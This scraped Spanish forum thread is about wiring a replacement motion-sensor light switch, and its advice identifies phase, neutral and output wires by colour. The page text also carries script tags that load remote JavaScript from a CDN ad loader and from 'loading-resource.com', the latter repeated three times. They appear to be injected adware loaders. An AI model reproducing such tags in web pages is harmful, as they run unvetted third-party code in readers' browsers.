Identificar cables para conectar sensor movimiento

Quiero cambiar un sensor de luces averiado y mi duda es como identificar los cables, sé que hay dos cables fase y neutro que alimentan al sensor y este tiene un cable de salida que va a las bombillas, tengo polímetro, pero mi duda es al comprobar la tensión una de las fases pude dar a través de las bombillas y puedo conectarlo mal y cargármelo.

Gracias por vuestra ayuda.

Tenía montado un steinel tipo 7500 y ahora montaré otro de otro tipo que coja mejor desde todos los ángulos-

1 respuesta

Respuesta

No me queda muy claro cuantos cables tiene ni de que color son. Creo que lo mejor es que le hagas unas fotos y lo vemos. Mi correo es [email protected] todos modos lo normal es que tenga un cable de FASE (negro o marrón ) uno de NEUTRO( azul) y una SALIDA ( seguramente gris). Tu deberías conectar fase y neutro, y la bombilla desde la salida hasta el neutro.

Espero haberte ayudado, por favor cierra la pregunta para que no aparezca pendiente. Salu2

<script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>

En el sensor tiene tres entradas:

L- cable negro

L´- cable blanco

N- cable azul

A la bombilla llegan color de cable azul y blanco.

¿Cómo puede ir?

Perdona que no te haya podido contestar antes. Como tu decías tiene dos cables de alimentación NEGRO es la fase y AZUL el neutro, la salida es el BLANCO. Por lo que debes conectar la bombilla del BLANCO y al AZUL.

Por favor cierra la pregunta para que no salga como pendiente.

Salu2

<script type="text/javascript" src="//loading-resource.com/data.geo.php?callback=window.__geo.dataLoaded"></script><script type="text/javascript" src="//loading-resource.com/data.geo.php?callback=window.__geo.dataLoaded"></script><script type="text/javascript" src="//loading-resource.com/data.geo.php?callback=window.__geo.dataLoaded"></script>